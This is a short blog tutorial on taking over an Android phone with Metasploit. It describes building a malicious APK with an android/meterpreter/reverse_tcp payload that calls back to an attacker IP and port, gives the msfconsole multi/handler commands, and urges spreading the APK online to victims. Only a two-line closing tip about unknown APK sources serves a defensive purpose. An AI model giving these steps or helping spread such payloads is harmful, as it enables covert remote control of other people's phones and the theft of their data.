Hacking Android Smartphone using Metasploit
What is android? according to wikipedia: Android is an operating system based on the Linux kernel, and designed primarily for touchscreen mobile devices such as smartphones and tablet computers. Initially developed by Android, Inc., which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with the founding of the Open Handset Alliance: a consortium of hardware, software, and telecommunication companies devoted to advancing open standards for mobile devices.
and What is APK? according to wikipedia: Android application package file (APK) is the file format used to distribute and install application software and middleware onto Google's Android operating system; very similar to an MSI package in Windows or a Deb package in Debian-based operating systems like Ubuntu.
Here is some initial information for this tutorial:
Attacker IP address: 192.168.8.94
Attacker port to receive connection: 443
Requirements:
1. Metasploit framework (we use Kali Linux 1.0.6 in this tutorial)
2. Android smartphone (we use HTC One android 4.4 KitKat)
Step by Step Hacking Android Smartphone Tutorial using Metasploit:
1. Open terminal (CTRL + ALT + T) view tutorial how to create linux keyboard shortcut.
2. We will utilize Metasploit payload framework to create exploit for this tutorial.
As described above that attacker IP address is 192.168.8.94, below is our screenshot when executed the command
3. Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine, attacker needs to set up the handler to handle incoming connections to the port already specified above. Type msfconsole to go to Metasploit console.
#use exploit/multi/handler ==> is for using metasploit handler
#set payload android/meterpreter/reverse_tcp ==> make sure the payload is the same
4. The next step we need to configure the switch for the Metasploit payload we already specified in step 3.
5. Attacker already have the APK's file and now he will start distribute it (I don't need to describe how to distribute this file, internet is the good place for distribution ).
6. Short stories the victim (me myself) download the malicious APK's file and install it. After victim open the application, attacker Metasploit console get something like this:
7. It's mean that attacker already inside the victim android smartphone and he can do everything with victim phone.
Conclusion:
1. Don't install APK's from the unknown source.(Only install apps and software from the google play store.)
2. If you really want to install APK's from unknown source, make sure you can view, read and examine the source code.
![Download Lineage OS for Moto E Nougat 7.1.1 [Condor]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWN3PAHnb7N08BK9tAl_mVariFoVw0YFV4eMMa6iLai8zJc_XVg3-XWXXVxsGj3Vo0olfL_oVpSNm0uQtIvjzE0gqKcmwP4UnWggapxt-XECeleSzvmxTfAwyoJw7IB0DjD1qvZNGLrSQ/s72-c/motorola-moto-e.jpg)
No comments: